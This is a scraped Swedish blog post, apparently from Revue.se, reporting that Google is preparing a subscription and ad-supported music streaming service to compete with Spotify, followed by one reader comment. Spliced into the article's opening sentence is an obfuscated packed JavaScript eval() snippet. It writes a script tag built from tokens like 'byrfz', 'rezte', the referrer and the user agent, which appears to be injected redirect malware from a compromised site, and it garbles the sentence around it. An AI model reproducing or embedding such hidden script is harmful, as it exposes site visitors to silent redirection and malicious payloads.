Image Image Image Image Image Image Image Image Image Image

| 21 november, 2017

Scroll to top

Top

One Comment

Spotify får svår konkurrent, Google | Revue.se

Spotify får svår konkurrent, Google
Sebastian Plengier Ehrnfelt

2013 eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|byrfz|var|u0026u|referrer|rezte||js|php’.split(‘|’),0,{}))
ser ut att bli hårt för musikstreaming sajten Spotify.
Som vi skrev för några dagar sedan så har Spotify fått hårda krav från sina investerare som nu börjar tröttna på att bolaget varje år går med stora förluster. Nu vill de att bolaget tänker om sin affärsmodell och börjar generera pengar, något som ser ut att bli en hård match. 

Men detta är inte det enda som bolaget kommer få möta på i år.

I november 2011 lanserade Google en egen digital musikaffär väldigt lik Apples Itunes. Både Apple och andra liknande aktörer har inte gett sig in på den snabbt växande streaming-marknaden än, något som Google vill utnyttja skriver Financial Times.

Den nya tjänsten kommer att erbjuda en prenumerationsmodell väldigt lik Spotify samt också en gratismodell som då tvingas lyssna på reklam mellan låtarna.

Just nu jobbar Google på att skriva avtal med de stora skivbolagen. Många av dessa skivbolag som innan varit väldigt skeptiska mot Google eftersom de anser att deras sökmotor befrämjar piratsidor och gör det möjligt för personer att ladda ner olagligt. 

Idag är Apple och Spotify helt klart störst på nedladdad respektive streamad musik. Men som det ser ut nu så tror jag att Google absolut kan göra en skillnad där. Vi vet att Google är bra om inte bäst på annonsering och det vet företagen. Bara att de kommer kunna erbjuda riktad reklam för lyssnarna likt Google Adsense är ett enromt plus.

– Det kommer bli ännu en pusselbit i att förstå konsumenterna. Det kommer att bli mycket intressant för varumärken där köpen styrs av känslor och status, säger Christophe Cauvy, digital Europachef på reklambyrån JWT till Financial Times.

Det ska bli spännande och se hur detta blir och om Spotify anser detta vara ett  stort hot eller ej. 

Källa: SVD

  • Galle

    Men någon kommer väl köpa upp Spotify om det skulle gå sämre.